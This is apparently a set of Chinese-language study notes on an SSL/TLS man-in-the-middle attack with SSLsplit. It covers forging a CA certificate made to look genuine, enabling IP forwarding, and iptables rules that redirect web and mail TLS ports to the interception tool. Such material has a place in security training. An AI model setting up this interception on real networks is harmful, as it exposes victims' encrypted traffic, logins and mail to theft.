SSL/TLS中间人攻击
SSLsplit
·透明SSL/TLS中间人攻击工具
·伪装成服务器与客户端
·伪装服务器需要伪造证书
·支持SSL/TLS加密的SMTP POP3 FTP等通信中间人攻击
利用openssl生成证书私钥
·openssl genrsa -out ca.key 2048(主流的密钥长度)
利用私钥签名生成证书
·openssl req(请求) -new(新的证书) -x509(证书格式) -days 1096(有效期) -key ca.key(生成需要的私钥) -out ca.crt (填写基本信息 尽量贴近真实)
生成根证书后 一会会伪造相应的证书
中间人需要路由功能(操作系统的)
·启动路由
sysctl -w net.ipv4.ip_forward=1(echo 1 > /proc/sys/net/ipv4/ip_forward)
iptables端口转发规则(发到443端口的流量 转发到sslsplit侦听的端口)(80 443端口不能被占用)
·iptables -L 来查看会泽设置
·iptables -t nat -L 查看net的规则 如果有加个-F情况掉
iptables -t nat -F
·首先 netstat -pantu | grep :444/80 然后结束掉响应
· iptables -t nat -F
· iptables -t(使用nat表) nat -A PREROUTING(路由之前就生效的规则) -p tcp --dport 80(发给80的流量) -j REDIRECT(重定向) --to-ports 8080 (到8080端口)
· iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443(与80 8080的一样)
· iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
除了转发TCP 其它的也可以
· iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
· iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
· iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
· Iptables -t nat -L